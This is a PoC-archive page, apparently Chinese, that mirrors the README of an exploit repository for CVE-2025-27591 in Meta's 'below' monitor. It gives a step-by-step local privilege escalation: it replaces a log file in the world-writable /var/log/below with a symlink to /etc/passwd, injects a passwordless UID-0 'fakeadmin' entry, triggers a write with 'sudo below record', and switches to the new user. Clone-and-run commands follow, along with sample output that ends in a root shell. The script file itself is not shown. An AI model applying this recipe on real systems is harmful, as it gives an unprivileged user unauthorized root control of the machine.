关联漏洞
标题:
below 安全漏洞
(CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
🔥 Local Privilege Escalation Exploit for CVE-2025-27591 | Abuses world-writable log dir in Below to gain root via /etc/passwd injection
介绍
# CVE-2025-27591 – Privilege Escalation via Symlink Abuse in `below`
[](https://github.com/00xCanelo)
[](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591)
> 🛑 **Disclaimer**: This exploit is provided **for educational and authorized security testing only**. Unauthorized use may be illegal.
---
## 🧠 Overview
`below` is a performance monitoring tool developed by Facebook for Linux systems. Versions of `below` prior to a patched release are affected by a critical vulnerability that allows **unprivileged users** to escalate to **root** by exploiting **world-writable log directories** and unsanitized log handling.
---
### 🔎 CVE Details
| Field | Value |
|------------------|------------------------------------------------|
| **CVE-ID** | [CVE-2025-27591](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591) |
| **Severity** | 🔥 Critical (CVSS ≈ 7.8 - 8.8) |
| **Attack Vector**| Local |
| **Impact** | Privilege Escalation to root (UID=0) |
| **Exploit Type** | Symlink Abuse / Log File Injection |
| **Affected App** | `below` – typically installed as `/usr/bin/below` |
| **Root Cause** | Unsafe file writes to `/var/log/below/` without permission checks |
---
## 💥 Exploit Logic
This Bash script performs the following:
1. **Check for World-Writable Directory**:
- Confirms if `/var/log/below` is world-writable (a red flag).
2. **Prepare Symlink Attack**:
- Deletes existing `error_root.log` (if any) and creates a symbolic link to `/etc/passwd`.
3. **Payload Construction**:
- Appends a fake root user to `/etc/passwd`:
```
fakeadmin::0:0:fakeadmin:/root:/bin/bash
```
4. **Trigger Logging**:
- Runs `sudo below record` to force the vulnerable binary to write logs.
5. **Gain Root Access**:
- Uses `su fakeadmin` to obtain a root shell with no password prompt.
---
## 📁 Directory Structure
```text
CVE-2025-27591/
├── exploit.sh
├── README.md
```
## ✅ Prerequisites
Before running the exploit, ensure you have the following:
- Bash shell (Linux system)
- The vulnerable binary installed: `/usr/bin/below`
- World-writable log directory: `/var/log/below`
- `sudo` privileges to execute: `sudo below record`
- Tools available:
- `ln` (to create symlinks)
- `su` (to switch users)
- `timeout` (to control execution time)
- `whoami` (for privilege check)
---
## 🚀 Exploitation Steps
```bash
# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Make the script executable
chmod +x exploit.sh
# 3. Execute the exploit
./exploit.sh
```
## 🧪 Sample Output
```bash
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
文件快照
[4.0K] /data/pocs/46e0f51d28472c8cc1b33c7df0f8c19784bf30bc
├── [2.4K] exploit.sh
└── [3.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。